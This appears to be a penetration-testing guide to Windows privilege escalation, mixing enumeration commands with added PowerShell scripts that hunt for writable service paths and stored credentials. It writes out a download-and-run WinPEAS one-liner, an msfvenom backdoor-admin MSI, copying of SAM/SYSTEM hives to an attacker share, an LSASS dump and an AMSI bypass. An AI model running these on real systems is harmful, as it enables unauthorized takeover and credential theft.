Windows Privilege Escalation Techniques
Privilege escalation is a critical phase in penetration testing where we attempt to gain higher-level permissions on a Windows system. This comprehensive guide covers the most effective techniques and tools for Windows privilege escalation.
Table of Contents
- Initial Information Gathering
- Automated Tools
- Service Exploits
- Registry Exploits
- File Permissions
- Scheduled Tasks
- Passwords and Tokens
Initial Information Gathering
Before attempting privilege escalation, gather system information:
System Information
systeminfo
whoami /all
whoami /priv
net user %username%
net localgroup administrators
Network Information
ipconfig /all
route print
netstat -ano
Running Processes and Services
tasklist /svc
sc query
wmic service list brief
Automated Tools
WinPEAS
# Download and run WinPEAS straight from GitHub. This is noisy on an engagement: it needs outbound access from the target and the script is heavily signatured by Defender/AMSI. The winPEASany.exe release from the same repository, copied over and run locally, is the quieter option.
powershell -c "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"
PowerUp
# Import PowerUp module
powershell -ep bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks
Windows Exploit Suggester
# On Kali Linux. The MSRC bulletin spreadsheet this tool consumes stopped being updated in 2017, so it only knows about pre-2017 patches; for newer builds use its successor wesng, which works from the Security Update Guide data instead.
python windows-exploit-suggester.py --database 2021-09-21-mssb.xls --systeminfo systeminfo.txt
Service Exploits
Unquoted Service Paths
Look for auto-start services whose binary path contains spaces but is not quoted. When such a service starts, the service control manager tries each space-delimited prefix before the real path (C:\Program.exe, then C:\Program Files\Some.exe, and so on), so write access to any of those parent directories lets you plant a binary that runs as the service account. You also need a way to trigger the start: an auto-start service plus a reboot (SeShutdownPrivilege), or start/stop rights on the service itself.
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
wmic is deprecated and not installed by default on current Windows 11 builds; Get-CimInstance Win32_Service exposes the same PathName and StartMode fields from PowerShell.
Service Permissions
Check if you can modify service configurations. SERVICE_CHANGE_CONFIG lets you point the service's binary path at your own file, and SERVICE_START/SERVICE_STOP lets you trigger it. Switches: -u suppresses errors, -w shows only objects you can write to, -c treats the names as services, -q omits the banner, -v prints the rights granted. Repeat the check for your own account and every group from whoami /groups, not just these three.
# Check service permissions
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Everyone" *
accesschk.exe /accepteula -uwcqv "Users" *
Service Binary Permissions
# Check if service binaries are writable. The first loop collects every non-System32 service image path (token 2 after the "=" in wmic's PathName= lines)
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\permissions.txt
# The second loop treats the quote as the delimiter so quoted paths with spaces survive, then keeps lines where a low-privilege principal holds Full (F), Modify (M) or Write (W). findstr ORs space-separated strings; it has no "\|" alternation
for /f eol^=^"^ delims^=^" %a in (%temp%\permissions.txt) do @(icacls "%a" 2>nul | findstr /i "(F) (M) (W)" | findstr /i "Everyone Users Authenticated")
Registry Exploits
AlwaysInstallElevated
Check if AlwaysInstallElevated is enabled:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If both return 0x1 (the HKLM and the HKCU value must both be set; one alone is not enough, and a missing value is reported as an error rather than 0), Windows Installer runs any MSI you launch as SYSTEM:
msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
msiexec /quiet /qn /i evil.msi
# windows/adduser creates the account and adds it to the local Administrators group; confirm with net localgroup administrators
Registry AutoRuns
Check for writable registry autoruns. HKLM Run/RunOnce entries execute for every user who logs in, so a writable target binary (or a writable Run key) runs your code the next time an administrator signs in; HKCU entries only run as you and gain nothing:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
File Permissions
DLL Hijacking
Look for missing DLLs in application directories and for writable directories on the DLL search path. A hijack only works when a privileged process loads a DLL that is not found in the locations searched before yours (the application directory, System32, the known-DLL list), so a writable PATH entry matters for DLLs the process cannot find anywhere, or when that entry precedes the DLL's real location:
# Process Monitor (ProcMon): filter on "Result is NAME NOT FOUND" and "Path ends with .dll" to see which DLLs a privileged process looks for and fails to find
# Check PATH directories for writable locations. The %%A form is for a .bat file; at an interactive prompt use %A. findstr ORs space-separated strings and has no "\|" alternation
for %%A in ("%path:;=";"%") do ( cmd /c icacls "%%~A" 2>nul | findstr /i "(M) (F) (W)" | findstr /i "Everyone Authenticated Users" && echo. )
Weak File Permissions
# Find writable files and directories (-u suppress errors, -w write access only, -s recurse). dir /q adds the owner column, so files owned by ordinary users inside Program Files stand out
accesschk.exe -uws "Everyone" "C:\Program Files"
dir "C:\Program Files" /s /q | findstr /i "users"
Scheduled Tasks
View Scheduled Tasks
schtasks /query /fo LIST /v
PowerShell Method
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
Check Task Permissions
# Check if you can modify scheduled task files. The task XML under C:\Windows\System32\Tasks is normally readable only by administrators, so expect access denied here; in that case check the executable each task runs ("Task To Run" in the schtasks /query /v output) and its directory for write access instead, and note which account the task runs as
icacls C:\Windows\System32\Tasks\*
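The checks in the Service Exploits, Registry AutoRuns, DLL Hijacking and Scheduled Tasks sections above all reduce to the same question: where does a privileged process launch a file that the current user can write, or plant? The following PowerShell is an added example, not code from the original page or from any of the tools it names. It runs that question once over services (including the unquoted-path prefixes), HKLM Run/RunOnce values, enabled scheduled-task actions and every PATH directory, and decides writability from the ACL against the current token's SIDs rather than from a hard-coded list of group names. It assumes Windows PowerShell 5.1 or PowerShell 7 on Windows 8 / Server 2012 or later; the function names, the skipped %SystemRoot% paths and the output columns are this example's own choices.

```powershell
# Added example, not code from the original page: one sweep over the launch targets that the
# Service Exploits, Registry AutoRuns, DLL Hijacking and Scheduled Tasks sections check by hand,
# listing the ones the current user can write to. Assumes Windows PowerShell 5.1 or PowerShell 7
# on Windows 8 / Server 2012 or later (Get-CimInstance and Get-ScheduledTask are needed).
$CurrentIdentity = [Security.Principal.WindowsIdentity]::GetCurrent()
$MySids = @($CurrentIdentity.User.Value) + @($CurrentIdentity.Groups | ForEach-Object { $_.Value })

function Test-WritableByMe {
    # True if an Allow ACE for the current user or one of its groups grants WriteData/CreateFiles,
    # AppendData, GENERIC_WRITE or GENERIC_ALL on $Path and no Deny ACE for them covers those bits.
    param([Parameter(Mandatory)][string]$Path)
    $writeMask = 0x2 -bor 0x4 -bor 0x40000000 -bor 0x10000000
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    $allowed = $false
    foreach ($ace in $acl.Access) {
        try { $sid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if ($MySids -notcontains $sid) { continue }
        if (([int]$ace.FileSystemRights -band $writeMask) -eq 0) { continue }
        if ($ace.AccessControlType -eq 'Deny') { return $false }
        $allowed = $true
    }
    return $allowed
}

function Split-CommandLine {
    # Executable path of a service/autorun/task command line, plus whether it was quoted.
    # Unquoted: everything up to the first ".exe" (what the loader would eventually resolve).
    param([string]$CommandLine)
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cmd.StartsWith('"') -and $cmd.IndexOf('"', 1) -gt 1) {
        return @{ Exe = $cmd.Substring(1, $cmd.IndexOf('"', 1) - 1); Quoted = $true }
    }
    $cmd = $cmd.TrimStart('"')
    if ($cmd -match '^(.+?\.exe)') { return @{ Exe = $Matches[1]; Quoted = $false } }
    return @{ Exe = ($cmd -split '\s+')[0]; Quoted = $false }
}

function Get-WritableLaunchTargets {
    $findings = New-Object System.Collections.Generic.List[object]
    $sysRoot = $env:SystemRoot
    function Add-Finding($Source, $Name, $Path, $Why) {
        $findings.Add([pscustomobject]@{ Source = $Source; Name = $Name; Path = $Path; Why = $Why })
    }
    function Test-LaunchCommand($Source, $Name, $CommandLine) {
        if (-not $CommandLine) { return }
        $parsed = Split-CommandLine $CommandLine
        $exe = $parsed.Exe
        # Paths under %SystemRoot% are skipped: writable ones are rare and mostly noise here.
        if (-not $exe -or $exe.StartsWith($sysRoot, 'OrdinalIgnoreCase')) { return }
        if ((Test-Path -LiteralPath $exe) -and (Test-WritableByMe $exe)) {
            Add-Finding $Source $Name $exe 'binary is writable'
        }
        $dir = Split-Path -Parent $exe
        if ($dir -and (Test-Path -LiteralPath $dir) -and (Test-WritableByMe $dir)) {
            Add-Finding $Source $Name $dir 'directory is writable (replace binary or drop a DLL)'
        }
        if (-not $parsed.Quoted -and $exe.Contains(' ')) {
            # CreateProcess tries each space-delimited prefix as "<prefix>.exe" before the real
            # path, so write access to that prefix's directory lets you plant the file it runs.
            $parts = $exe.Split(' ')
            for ($i = 1; $i -lt $parts.Length; $i++) {
                $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
                $parent = Split-Path -Parent $candidate
                if ($parent -and (Test-Path -LiteralPath $parent) -and (Test-WritableByMe $parent)) {
                    Add-Finding $Source $Name $candidate 'unquoted path: this file would run first'
                }
            }
        }
    }
    foreach ($svc in Get-CimInstance Win32_Service) {
        Test-LaunchCommand 'Service' "$($svc.Name) [$($svc.StartName), $($svc.StartMode)]" $svc.PathName
    }
    # HKLM keys only: an HKCU Run entry executes as the current user and gains nothing.
    foreach ($key in 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
                     'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce') {
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($p in ($props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' })) {
            Test-LaunchCommand 'Autorun' "$key\$($p.Name)" ([string]$p.Value)
        }
    }
    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue | Where-Object State -ne 'Disabled')) {
        foreach ($action in $task.Actions) {
            if ($action.Execute) {
                Test-LaunchCommand 'Task' "$($task.TaskPath)$($task.TaskName) [$($task.Principal.UserId)]" $action.Execute
            }
        }
    }
    foreach ($dir in ($env:PATH -split ';' | Where-Object { $_ })) {
        if ((Test-Path -LiteralPath $dir) -and (Test-WritableByMe $dir)) {
            Add-Finding 'PATH' $dir $dir 'writable PATH directory (DLL search order)'
        }
    }
    return $findings
}

Get-WritableLaunchTargets | Format-Table -AutoSize -Wrap
```

Every finding still needs a trigger: a service you can start or that auto-starts after a reboot, an autorun that fires at an administrator's next logon, a task that is due to run, or a process that actually loads a DLL from the writable PATH entry. Writability is decided from Allow and Deny ACEs only; a directory that is writable but whose existing files are not can still be used to plant a new file, which is exactly the unquoted-path case.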
Passwords and Tokens
Credential Manager
cmdkey /list
# /savecred only works when cmdkey lists a saved "Domain Password" credential for that account (Target: Domain:interactive=...); otherwise runas prompts for the password
runas /savecred /user:administrator cmd.exe
SAM and SYSTEM Files
# If you have read access to backup copies of the SAM and SYSTEM hives. The live hives under System32\config are locked and readable only by SYSTEM; C:\Windows\System32\config\RegBack is another location to check, though on current Windows the files there are usually empty. Dump the hashes offline with Impacket's secretsdump (-sam SAM -system SYSTEM LOCAL)
copy C:\Windows\Repair\SAM \\attacker\share\
copy C:\Windows\Repair\SYSTEM \\attacker\share\
Memory Dumps
# Look for credentials in memory. Dumping LSASS needs SeDebugPrivilege, i.e. an administrator token, so this is credential harvesting after escalation rather than a way to escalate; Defender and LSA protection (RunAsPPL) block it on hardened hosts
procdump.exe -accepteula -ma lsass.exe lsass.dmp
PowerShell History
# cmd form; from PowerShell, (Get-PSReadlineOption).HistorySavePath gives the exact file. Other users' histories under C:\Users\*\AppData are worth trying as well, they are only protected by the profile ACL
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
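The Credential Manager, SAM and SYSTEM Files and PowerShell History sections above each describe a manual look at one credential source. The following PowerShell is an added example, not code from the original page: it reports whether the backup hive copies are readable (and how large they are, since the RegBack files on current Windows are usually zero bytes), parses cmdkey /list into objects and flags the entries that runas /savecred can actually use, and greps every PSReadLine history file the current user can read. The hive locations, the credential regex and the assumption of English cmdkey output are this example's own choices.

```powershell
# Added example, not code from the original page: one pass over the sources the Credential
# Manager, SAM and SYSTEM Files and PowerShell History sections describe. Reports whether the
# backup hive copies are readable, parses cmdkey /list for credentials usable with runas /savecred,
# and greps every PSReadLine history you can read. Hive paths and the regex are this example's choices.
function Get-ReadableBackupHives {
    # Repair\ and RegBack\ copies come from old installs or backup jobs; on current Windows 10/11 the
    # RegBack files exist but are 0 bytes, hence the size column.
    $hives = @(
        "$env:SystemRoot\Repair\SAM", "$env:SystemRoot\Repair\SYSTEM",
        "$env:SystemRoot\System32\config\RegBack\SAM", "$env:SystemRoot\System32\config\RegBack\SYSTEM"
    )
    foreach ($p in $hives) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        try {
            $fs = [IO.File]::Open($p, 'Open', 'Read', 'ReadWrite')
            $size = $fs.Length; $fs.Close()
            [pscustomobject]@{ Path = $p; Readable = $true; Bytes = $size }
        } catch {
            [pscustomobject]@{ Path = $p; Readable = $false; Bytes = 0 }
        }
    }
}

function Get-SavedCredentials {
    # cmdkey /list prints blocks of "Target: ... / Type: ... / User: ..." lines (English locale
    # assumed). Only a "Domain Password" entry whose Target starts with Domain:interactive= is what
    # runas /savecred will use; generic entries are application secrets worth a look on their own.
    $current = $null
    foreach ($line in (cmdkey /list 2>$null)) {
        if ($line -match '^\s*Target:\s*(.+)$') {
            $current = [ordered]@{ Target = $Matches[1].Trim(); Type = ''; User = ''; RunasUsable = $false }
        } elseif ($current -and $line -match '^\s*Type:\s*(.+)$') {
            $current.Type = $Matches[1].Trim()
        } elseif ($current -and $line -match '^\s*User:\s*(.+)$') {
            $current.User = $Matches[1].Trim()
            $current.RunasUsable = ($current.Type -eq 'Domain Password' -and $current.Target -like 'Domain:interactive=*')
            [pscustomobject]$current
            $current = $null
        }
    }
}

function Find-HistoryCredentials {
    # Other users' histories are normally ACL-protected; shared or misconfigured hosts leak them.
    $pattern = '(?i)(password|passwd|-AsPlainText|ConvertTo-SecureString|PSCredential|net user|runas |cmdkey |/savecred)'
    $glob = "$env:SystemDrive\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
    foreach ($f in (Get-ChildItem -Path $glob -ErrorAction SilentlyContinue)) {
        Select-String -LiteralPath $f.FullName -Pattern $pattern -ErrorAction SilentlyContinue |
            ForEach-Object { [pscustomobject]@{ File = $f.FullName; Line = $_.LineNumber; Text = $_.Line.Trim() } }
    }
}

Get-ReadableBackupHives | Format-Table -AutoSize
Get-SavedCredentials | Format-Table -AutoSize
Find-HistoryCredentials | Format-Table -AutoSize -Wrap
```

A readable hive pair is only useful together: the SAM hashes are encrypted with a key derived from SYSTEM, which is why both files are copied off in the section above. The RunasUsable column is what turns a cmdkey listing into an action; a generic credential still has to be pulled out with a DPAPI tool, which is outside this page's scope.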
Token Impersonation
SeImpersonatePrivilege
If you have SeImpersonatePrivilege (normally held by service accounts such as IIS application pools and SQL Server, not by interactive standard users), a local COM or named-pipe trick can coerce a SYSTEM process into authenticating to you so that you impersonate its token. Check whoami /priv for the privilege first, then pick the tool by build:
- JuicyPotato (Windows 7 / Server 2008 R2 through Windows 10 1803 / Server 2016; needs a usable CLSID and stops working with the DCOM changes in 1809)
- RoguePotato (Windows 10 1809+ / Server 2019+; needs a host you control to redirect the OXID resolver traffic back to the target)
- PrintSpoofer (Windows 8.1 / Server 2012 R2 through Windows 10 / Server 2019; requires the Print Spooler service to be running)
# Example with PrintSpoofer: -i interactive session, -c the command to run as SYSTEM
PrintSpoofer.exe -i -c cmd
Kernel Exploits
Check Windows Version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
Common Kernel Exploits
- MS16-032 (Secondary Logon handle leak; Windows Vista through 10 and Server 2008 through 2012 R2 without the March 2016 update)
- MS17-017 (Windows kernel elevation of privilege; Windows Vista through 10 and Server 2008 through 2016 without the March 2017 update)
- CVE-2019-1388 (not a kernel bug but a UAC certificate-dialog elevation through hhupd.exe; Windows 7 through 10 and Server 2008 through 2019, and it needs an interactive desktop session)
Compare the hotfix list from systeminfo against the update that fixed each bug before trying it; a failed kernel exploit usually crashes the host rather than failing quietly.
Detection and Evasion
Anti-Virus Evasion
# Check AV status. The root\SecurityCenter2 namespace exists only on client SKUs; on servers query Defender directly with Get-MpComputerStatus or look at the running security products' services
Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct
AMSI Bypass (PowerShell)
# AMSI Bypass example: the classic amsiInitFailed flip. Defender signatures this exact string, so as written it is blocked on a current host; it illustrates the technique (disable AMSI inside the current PowerShell process), not a ready-to-use bypass
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Best Practices
- Always gather system information first
- Use automated tools for initial reconnaissance
- Verify exploits in isolated environments first
- Document all findings for reporting
- Clean up artifacts after testing
Useful Resources
Remember to always test these techniques in authorized environments only. Privilege escalation should only be performed during legitimate penetration testing engagements with proper authorization.
Stay ethical, stay secure.